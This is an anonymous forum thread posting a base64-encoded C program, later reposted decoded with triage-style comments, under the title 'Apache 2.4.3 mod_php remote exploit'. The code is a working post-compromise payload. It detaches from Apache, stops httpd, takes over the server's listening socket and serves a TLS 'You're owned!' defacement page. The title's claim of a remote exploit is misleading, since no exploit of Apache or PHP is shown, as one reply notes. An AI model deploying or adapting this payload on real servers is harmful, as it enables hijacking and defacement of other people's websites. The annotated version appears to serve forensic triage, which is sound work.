
Apache 2.4.3 mod_php remote exploit

Name: Anonymous 2013-02-20 14:51

I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5o
PgojaW5jbHVkZSA8c2lnbmFsLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8c3lzL3Nl
bGVjdC5oPgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8b3BlbnNzbC9zc2wuaD4K
Ci8qCiAqIFRoZSBiYXNpYyBhY3Rpb25zIGFyZSBsaWtlIHRoaXM6CiAqICAgICAgMSkgQmVjb21l
IHNlc3Npb24gbGVhZGVyCiAqICAgICAgMikgR2V0IHJpZCBvZiB0aGUgcGFyZW50IChhcGFjaGUp
CiAqICAgICAgMykgU3RhcnQgaGFuZGxpbmcgcmVxdWVzdHMKICovCgojZGVmaW5lIExJU1RFTl9E
RVNDUklQVE9SIDQKI2RlZmluZSBDRVJURiAiL3Zhci93d3cvaHRtbC9mb28tY2VydC5wZW0iCiNk
ZWZpbmUgS0VZRiAgIi92YXIvd3d3L2h0bWwvZm9vLWNlcnQucGVtIgoKc3RhdGljIFNTTF9DVFgg
ICAgKmN0eDsKc3RhdGljIFNTTCAgICAgICAgKnNzbDsKc3RhdGljIFg1MDkgICAgICAgKmNsaWVu
dF9jZXJ0OwpzdGF0aWMgU1NMX01FVEhPRCAqbWV0aDsKCnN0YXRpYyB2b2lkIHNlcnZlcl9sb29w
KGludCBkZXNjcik7CnN0YXRpYyB2b2lkIHNzbF9pbml0KHZvaWQpOwoKaW50IG1haW4oaW50IGFy
Z2MsIGNoYXIgKmFyZ3ZbXSkKewogICAgLyogTmVlZCB0byBmb3JrIHNvIGFwYWNoZSBkb2Vzbid0
IGtpbGwgdXMgKi8KICAgIGlmIChmb3JrKCkgPT0gMCkgewogICAgICAgIC8qIEJlY29tZSBzZXNz
aW9uIGxlYWRlciAqLwogICAgICAgIHNldHNpZCgpOwogICAgICAgIHNsZWVwKDIpOwoKICAgICAg
ICAvKiBqdXN0IGluIGNhc2Ugb25lIHdhcyBhIGNvbnRyb2xsaW5nIHR0eSAqLwogICAgICAgIGNs
b3NlKDApOyBjbG9zZSgxKTsgY2xvc2UoMik7CiAgICAgICAgc3NsX2luaXQoKTsKICAgICAgICBz
ZXJ2ZXJfbG9vcChMSVNURU5fREVTQ1JJUFRPUik7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAg
ICAgc2xlZXAoMSk7CiAgICAgICAgc3lzdGVtKCIvdXNyL3NiaW4vaHR0cGQgLWsgc3RvcCIpOwog
ICAgICAgIHNsZWVwKDEpOwogICAgfQogICAgcmV0dXJuIDA7Cn0KCnN0YXRpYyB2b2lkIHNlcnZl
cl9sb29wKGludCBkZXNjcikKewogICAgc3RydWN0IHRpbWV2YWwgICB0djsKICAgIGZkX3NldCBy
ZWFkX21hc2sgOwoKICAgIEZEX1pFUk8oJnJlYWRfbWFzayk7CiAgICBGRF9TRVQoZGVzY3IsICZy
ZWFkX21hc2spOwogICAgZm9yICg7OykgewogICAgICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByZW1v
dGU7CiAgICAgICAgc29ja2xlbl90IGxlbiA9IHNpemVvZihyZW1vdGUpOwogICAgICAgIGludCBm
ZDsKCiAgICAgICAgaWYgKHNlbGVjdChkZXNjcisxLCAmcmVhZF9tYXNrLCBOVUxMLCBOVUxMLCAw
ICkgPT0gLTEpCiAgICAgICAgICAgIGNvbnRpbnVlOwogICAgICAgIGZkID0gYWNjZXB0KGRlc2Ny
LCAmcmVtb3RlLCAmbGVuKTsKICAgICAgICBpZiAoZmQgPj0wKSB7CiAgICAgICAgICAgIGNoYXIg
b2J1ZlsxMDI0XTsKICAgICAgICAgICAgaWYgKChzc2wgPSBTU0xfbmV3IChjdHgpKSAhPSBOVUxM
KSB7CiAgICAgICAgICAgICAgICBTU0xfc2V0X2ZkIChzc2wsIGZkKTsKICAgICAgICAgICAgICAg
IFNTTF9zZXRfYWNjZXB0X3N0YXRlKHNzbCk7CiAgICAgICAgICAgICAgICBpZiAoKFNTTF9hY2Nl
cHQgKHNzbCkpID09IC0xKQogICAgICAgICAgICAgICAgICAgICAgICBleGl0KDEpOwoKICAgICAg
ICAgICAgICAgIHN0cmNweShvYnVmLCAiSFRUUC8xLjAgMjAwIE9LXG4iKTsKICAgICAgICAgICAg
ICAgIHN0cmNhdChvYnVmLCAiQ29udGVudC1MZW5ndGg6IDQwXG4iKTsKICAgICAgICAgICAgICAg
IHN0cmNhdChvYnVmLCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxcblxuIik7CiAgICAgICAgICAg
ICAgICBzdHJjYXQob2J1ZiwgIjxodG1sPjxib2R5PllvdSdyZSBvd25lZCE8L2JvZHk+PC9odG1s
PiIpOwogICAgICAgICAgICAgICAgU1NMX3dyaXRlIChzc2wsIG9idWYsIHN0cmxlbihvYnVmKSk7
CiAgICAgICAgICAgICAgICBTU0xfc2V0X3NodXRkb3duKHNzbCwKICAgICAgICAgICAgICAgICAg
ICAgICAgU1NMX1NFTlRfU0hVVERPV058U1NMX1JFQ0VJVkVEX1NIVVRET1dOKTsKICAgICAgICAg
ICAgICAgIFNTTF9mcmVlIChzc2wpOwogICAgICAgICAgICAgICAgRVJSX3JlbW92ZV9zdGF0ZSgw
KTsKICAgICAgICAgICAgfQogICAgICAgICAgICBjbG9zZShmZCk7CiAgICAgICAgfQogICAgfQog
ICAgU1NMX0NUWF9mcmVlIChjdHgpOyAgLyogTmV2ZXIgZ2V0cyBjYWxsZWQgKi8KfQoKc3RhdGlj
IHZvaWQgc3NsX2luaXQodm9pZCkKewogICAgICAgIFNTTF9sb2FkX2Vycm9yX3N0cmluZ3MoKTsK
ICAgICAgICBTU0xlYXlfYWRkX3NzbF9hbGdvcml0aG1zKCk7CiAgICAgICAgbWV0aCA9IFNTTHYy
M19zZXJ2ZXJfbWV0aG9kKCk7CiAgICAgICAgY3R4ID0gU1NMX0NUWF9uZXcgKG1ldGgpOwogICAg
ICAgIGlmICghY3R4KQogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAgICBpZiAoU1NMX0NU
WF91c2VfY2VydGlmaWNhdGVfZmlsZShjdHgsIENFUlRGLAogICAgICAgICAgICAgICAgICAgICAg
ICBTU0xfRklMRVRZUEVfUEVNKSA8PSAwKQogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAg
ICBpZiAoU1NMX0NUWF91c2VfUHJpdmF0ZUtleV9maWxlKGN0eCwgS0VZRiwKICAgICAgICAgICAg
ICAgICAgICAgICAgU1NMX0ZJTEVUWVBFX1BFTSkgPD0gMCkKICAgICAgICAgICAgICAgIGV4aXQo
MSk7CiAgICAgICAgaWYgKCFTU0xfQ1RYX2NoZWNrX3ByaXZhdGVfa2V5KGN0eCkpCiAgICAgICAg
ICAgICAgICBleGl0KDEpOwp9Cgo=

Name: Anonymous 2013-02-20 18:16

IHBT.

Name: Anonymous 2013-02-20 18:43

Is this text? Or a binary file? We know PHP is broken by default.

Name: Anonymous 2013-02-20 20:14

It's a base64-encoded C file. The C file looks more like a payload for an exploit than an actual exploit.

Name: Anonymous 2013-02-20 21:37

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
 * The basic actions are like this:
 *      1) Become session leader
 *      2) Get rid of the parent (apache)
 *      3) Start handling requests
 */

/* Descriptor number that server_loop() is handed by main(). Nothing in this
 * file creates, binds or listens on a socket, so the descriptor has to be
 * open already when the program starts.
 * NOTE(review): presumably the web server's listening socket inherited from
 * the launching process -- confirm against how the binary gets started. */
#define LISTEN_DESCRIPTOR 4
/* Certificate and private key are both read from the same PEM file under
 * /var/www/html (conventionally the web document root). The path is a
 * filesystem artifact worth checking for during triage. */
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF  "/var/www/html/foo-cert.pem"

/* Process-wide TLS state: ctx and meth are assigned in ssl_init(), ssl is
 * reassigned for every accepted connection in server_loop(). */
static SSL_CTX    *ctx;
static SSL        *ssl;
/* Declared but not referenced anywhere else in this listing. */
static X509       *client_cert;
static SSL_METHOD *meth;

/* Forward declarations; both functions are defined after main(). */
static void server_loop(int descr);
static void ssl_init(void);

/*
 * Entry point: splits into a detached child that answers TLS connections on
 * LISTEN_DESCRIPTOR and a parent that asks httpd to stop.
 *
 * argc and argv are not used. The parent returns 0 after the stop command;
 * the child only reaches the return if server_loop() returns, which its
 * infinite loop never does.
 *
 * The results of fork(), setsid() and system() are not checked, so a failed
 * fork() (-1) falls into the parent branch and httpd is still told to stop.
 *
 * Triage note: the observable end state is a process in its own session,
 * with descriptors 0-2 closed, that is not httpd but still holds the
 * listening descriptor after httpd has been stopped. Process and socket
 * listings are where that shows up.
 * NOTE(review): this only works if descriptor 4 is left open across the
 * launch of this binary (i.e. not marked close-on-exec) -- not visible here.
 */
int main(int argc, char *argv[])
{
    /* Need to fork so apache doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();
        /* The child waits longer than the parent's first sleep(1), so the
         * stop command has been issued before the child starts serving. */
        sleep(2);

        /* just in case one was a controlling tty */
        close(0); close(1); close(2);
        /* From here on there is no stderr: every failure in ssl_init() is a
         * silent exit(1). */
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    else
    {
        sleep(1);
        /* Fixed command string with an absolute path; no external input is
         * interpolated into it. */
        system("/usr/sbin/httpd -k stop");
        sleep(1);
    }
    return 0;
}

/*
 * Accept loop on an already-listening descriptor.
 *
 * descr: descriptor passed straight to select() and accept(); this function
 *        never creates or binds a socket itself.
 *
 * For each accepted connection it performs a server-side TLS handshake with
 * the global ctx, writes one fixed HTTP response, and closes the connection.
 * No request bytes are read and nothing from the peer reaches obuf.
 * Does not return: the loop has no exit other than exit(1) on a failed
 * handshake.
 */
static void server_loop(int descr)
{
    /* tv is declared but never used; select() below gets a null timeout. */
    struct timeval   tv;
    fd_set read_mask ;

    /* The descriptor set is built once, before the loop. */
    FD_ZERO(&read_mask);
    FD_SET(descr, &read_mask);
    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        /* Last argument 0 is a null timeout pointer, so this blocks until
         * the descriptor is readable or select() fails. */
        if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
            continue;
        /* The peer address is stored in remote but never inspected or
         * logged. */
        fd = accept(descr, &remote, &len);
        if (fd >=0) {
            char obuf[1024];
            if ((ssl = SSL_new (ctx)) != NULL) {
                SSL_set_fd (ssl, fd);
                SSL_set_accept_state(ssl);
                /* A handshake that returns -1 ends the whole process, not
                 * just this connection. */
                if ((SSL_accept (ssl)) == -1)
                        exit(1);

                /* Response is assembled from string literals only; the
                 * total is far below sizeof(obuf). */
                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 40\n");
                strcat(obuf, "Content-Type: text/html\n\n");
                strcat(obuf, "<html><body>You're owned!</body></html>");
                /* Return value of SSL_write() is not checked. */
                SSL_write (ssl, obuf, strlen(obuf));
                /* Marks the session as shut down in both directions without
                 * calling SSL_shutdown(), then releases it. */
                SSL_set_shutdown(ssl,
                        SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
                SSL_free (ssl);
                /* Legacy OpenSSL call that clears the error queue state. */
                ERR_remove_state(0);
            }
            /* The socket is closed whether or not SSL_new() succeeded. */
            close(fd);
        }
    }
    SSL_CTX_free (ctx);  /* Never gets called */
}

/*
 * One-time OpenSSL setup: fills the file-scope meth and ctx used by
 * server_loop().
 *
 * Loads the certificate from CERTF and the private key from KEYF (both name
 * the same PEM file) and verifies that the key matches the certificate.
 * Every failure path is exit(1) with no message; main() has already closed
 * descriptors 0-2 before calling this, so nothing could be printed anyway.
 *
 * Triage note: the PEM file has to exist on disk at the CERTF/KEYF path
 * before this runs, so its presence and timestamps are evidence in their
 * own right.
 */
static void ssl_init(void)
{
        /* Legacy (pre-1.1.0 style) library initialisation calls. */
        SSL_load_error_strings();
        SSLeay_add_ssl_algorithms();
        /* Version-flexible server method; no protocol or cipher options are
         * set on the context afterwards. */
        meth = SSLv23_server_method();
        ctx = SSL_CTX_new (meth);
        if (!ctx)
                exit(1);
        /* Certificate, read as PEM from CERTF. */
        if (SSL_CTX_use_certificate_file(ctx, CERTF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        /* Private key, read as PEM from KEYF (same file as the cert). */
        if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        /* Reject a key that does not correspond to the loaded certificate. */
        if (!SSL_CTX_check_private_key(ctx))
                exit(1);
}
